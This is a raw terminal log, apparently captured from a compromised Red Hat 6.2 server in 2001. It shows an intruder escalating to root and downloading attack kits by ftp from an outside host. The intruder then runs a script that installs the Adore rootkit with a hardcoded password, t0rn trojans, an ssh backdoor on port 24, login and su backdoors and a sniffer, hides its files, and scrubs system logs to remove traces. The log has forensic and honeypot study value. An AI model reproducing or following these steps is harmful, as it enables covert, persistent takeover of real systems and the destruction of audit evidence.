Red Hat Linux release 6.2 (Zoot) Kernel 2.2.14-5.0 on an i586 login: nobody Last login: Sun Sep 16 04:32:21 from 217.156.93.166 sh: ulimit: cannot modify limit: Operation not permitted sh-2.03$ su dns nobody@ns1: /[root@ns1 /]# w 4:49am up 3 days, 10:57, 1 user, load average: 0.00, 0.00, 0.04 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT nobody pts/0 217.156.93.166 4:49am 0.00s 1.02s ? - nobody@ns1: /[root@ns1 /]# cd cd /tmp nobody@ns1: /tmp[root@ns1 /tmp]# mc -s bash: mc: command not found nobody@ns1: /tmp[root@ns1 /tmp]# f ftp teleport. cd /dev/rd nobody@ns1: /dev/rd[root@ns1 rd]# ftp teleport.go.ro nobody@ns1: /dev/rd[root@ns1 rd]# nobody@ns1: /dev/rd[root@ns1 rd]# nobody@ns1: /dev/rd[root@ns1 rd]# mkdir sdc0 nobody@ns1: /dev/rd[root@ns1 rd]# cd sdc0 nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# ls nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# lscd sdc0[4hmkd[4lir sdc0ftp teleport.go.ro Connected to teleport.go.ro. 220- 220- 220- H O M E . R O 220- 220- This server is for HOME.RO members only. 220- Go to http://www.home.ro/ to register. 220- 220- No anonymous access allowed. 220- 220- 220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42] Name (teleport.go.ro:nobody): teleport 331 Password required for teleport. Password: 230 User teleport logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd new 250 CWD command successful. ftp> get Zer0.tar.gz local: Zer0.tar.gz remote: Zer0.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes). 226 Transfer complete. 139711 bytes received in 7.76 secs (18 Kbytes/sec) ftp> by get copy.tar.gz local: copy.tar.gz remote: copy.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes). 226 Transfer complete. 265189 bytes received in 14.6 secs (18 Kbytes/sec) ftp> get ooty.tar.gz local: ooty.tar.gz remote: ooty.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes). 226 Transfer complete. 14847 bytes received in 0.856 secs (17 Kbytes/sec) ftp> bye 221 Goodbye. ]0;nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# tar zxvf Zer0.tar.gz Zer0/ tar: Archive contains future timestamp 2001-09-16 20:26:34 Zer0/Go Zer0/ssh.tgz Zer0/tls.tgz Zer0/adr.tgz Zer0/adr2.tgz tar: Archive contains future timestamp 2001-09-16 20:27:45 Zer0/adore.h nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# ./Zer0/[1P[1P[4hc[4l[4hd[4l[4h [4l nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# ls Go adore.h adr.tgz adr2.tgz ssh.tgz tls.tgz nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# ./ ./Go 24 syslogd: no process killed ==================================================================== .oooo. oooo o8o . .o8 d8P''Y8b '888 ''' .o8 .o888oo 888 888 oooo d8b ooo. .oo. 888 oooo oooo .o888oo 888 888 888 '888''8P '888P'Y88b 888 .8P' '888 888 888 888 888 888 888 888 888888. 888 888 888 . '88b d88' 888 888 888 888 '88b. 888 888 . '888' 'Y8bd8P' d888b o888o o888o o888o o888o o888o '888' Modificat de mine... Viruzzel ==================================================================== backdooring started on ns1 # # # # checking for remote logging... holy guacamole batman ${RED} REMOTE LOGGING DETECTED ${RES} ${WHI} I hope you can get to these other computer(s): ${RES} 000.000.00.000 ${WHI} cuz this computer is LOGGING to it... ${RES} -------------------------------------------------------------------- # [Droping files...] -------------------------------------------------------------------- nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# exit .t0rn/ .t0rn/shhk .t0rn/shrs .t0rn/shhk.pub .t0rn/shsml .t0rn/sharsed .t0rn/shdcf2 .t0rn/shhash EOT CVS/ CVS/Root CVS/Repository CVS/Entries CVS/Tag Makefile.gen tar: Archive contains future timestamp 2029-09-09 09:05:12 adore.c adore.h ava.c cleaner.c cnfad dummy.c libinvisible.c libinvisible.h pass rename.c stad lgstrip nscd.init patch vrssb vrssnf vrssnk -------------------------------------------------------------------- # [Installing trojans...] -------------------------------------------------------------------- # Using ssh-port : 24 -------------------------------------------------------------------- [System Information...] -------------------------------------------------------------------- Hostname : ns1 (192.168.1.102) Arch : i586 -+- bogomips : 187.19 ' Alternative IP : 127.0.0.1 -+- Might be [ 1 ] active adapters. Distribution: Red Hat Linux release 6.2 (Zoot) -------------------------------------------------------------------- ipchains ...? -------------------------------------------------------------------- Chain input (policy ACCEPT): -------------------------------------------------------------------- # [Searching for Make, gcc...] -------------------------------------------------------------------- Make found! gcc found! -------------------------------------------------------------------- # [Installing adore...] -------------------------------------------------------------------- Starting adore configuration ... Checking 4 ELITE_UID ... found 30 Checking 4 ELITE_CMD ... using 107613 Checking 4 SMP ... NO Checking 4 MODVERSIONS ... YES Checking for kgcc ... found cc Checking 4 insmod ... found /sbin/insmod -- OK Loaded modules: lockd 31592 1 (autoclean) sunrpc 53540 1 (autoclean) [lockd] pcnet32 10692 1 (autoclean) Since version 0.33 Adore requires 'authentication' for its services. You will be prompted for a password now and this password will be compiled into 'adore' and 'ava' so no further actions by you are required. This procedure will save adore from scanners. Try to choose a unique name that won't clash with normal calls to mkdir(2). Password (echoed):labutza Preparing /usr/X11R6/bin/.,/copy/adr (== cwd) for hiding ... Creating Makefile ... *** Edit adore.h for the hidden services and redirected file-access *** cp: Makefile: No such file or directory make: *** Warning: File `adore.c' has modification time in the future (2029-09-09 09:05:12 > 2001-09-16 05:02:21) rm -f adore.o cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS adore.c -o adore.o adore.c:484: warning: `/*' within comment cc -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS ava.c libinvisible.c -o ava cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS cleaner.c make: *** Warning: Clock skew detected. Your build may be incomplete. ava found... proceeding! sniffer running! Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/usr/X11R6/bin/.,' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/usr/info/.t0rn' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/dev/rd/sdc0' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/dev/rd/nscd.init' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/etc/rc.d/rc3.d/S50inet' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/usr/X11R6/lib/X11/.~' hided. done hiding... -------------------------------------------------------------------- # [hmmm...nothing to worry about, for you, hehehe...] -------------------------------------------------------------------- USE this file for testing purposes ONLY ... tested on RH6.2 Login backdooring started ... Step 1: Setting login parameters ...[60G [ OK ] Step 2: Setting su parameters ...[60G [ OK ] Step 3: Creating config files ...[60G [ OK ] Done??!!?hmmm.. who knows... :P I DO! hihihi -------------------------------------------------------------------- # [Removing unnecessary files.. cleaning...] -------------------------------------------------------------------- * sauber by socked [13.03.2k+1] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (133 lines)...0 lines removed! * Cleaning cron (8 lines)...0 lines removed! * Cleaning cron.1 (599 lines)...0 lines removed! * Cleaning dmesg (70 lines)...0 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (24 lines)...0 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (383 lines)...6 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (52 lines)...10 lines removed! * Cleaning sendmail.st (0 lines)...-1 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! syslogd: no process killed * Alles sauber mein Meister !'Q%&@ * sauber by socked [13.03.2k+1] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (133 lines)...0 lines removed! * Cleaning cron (8 lines)...0 lines removed! * Cleaning cron.1 (599 lines)...0 lines removed! * Cleaning dmesg (70 lines)...0 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (24 lines)...0 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (377 lines)...1 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (42 lines)...26 lines removed! * Cleaning sendmail.st (1 lines)...0 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! syslogd: no process killed * Alles sauber mein Meister !'Q%&@ * sauber by socked [13.03.2k+1] * * Cleaning logs.. This may take a bit depending on the size of the logs. * Cleaning boot.log (0 lines)...0 lines removed! * Cleaning boot.log.1 (133 lines)...0 lines removed! * Cleaning cron (8 lines)...0 lines removed! * Cleaning cron.1 (599 lines)...0 lines removed! * Cleaning dmesg (70 lines)...0 lines removed! * Cleaning htmlaccess.log (0 lines)...0 lines removed! * Cleaning maillog (0 lines)...0 lines removed! * Cleaning maillog.1 (24 lines)...0 lines removed! * Cleaning messages (0 lines)...0 lines removed! * Cleaning messages.1 (376 lines)...0 lines removed! * Cleaning netconf.log (0 lines)...0 lines removed! * Cleaning secure (0 lines)...0 lines removed! * Cleaning secure.1 (16 lines)...0 lines removed! * Cleaning sendmail.st (1 lines)...0 lines removed! * Cleaning spooler (0 lines)...0 lines removed! * Cleaning spooler.1 (0 lines)...0 lines removed! * Cleaning xferlog (0 lines)...0 lines removed! * Cleaning xferlog.1 (0 lines)...0 lines removed! syslogd: no process killed * Alles sauber mein Meister !'Q%&@ -------------------------------------------------------------------- # [Linking /bin/.bash_history, adjusting time...] -------------------------------------------------------------------- ==================================================================== HIHIHI.. CICA GATA.. AM TERMINAT!! Zer0... by Viruzzel ==================================================================== ]0;nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# exit sh-2.03$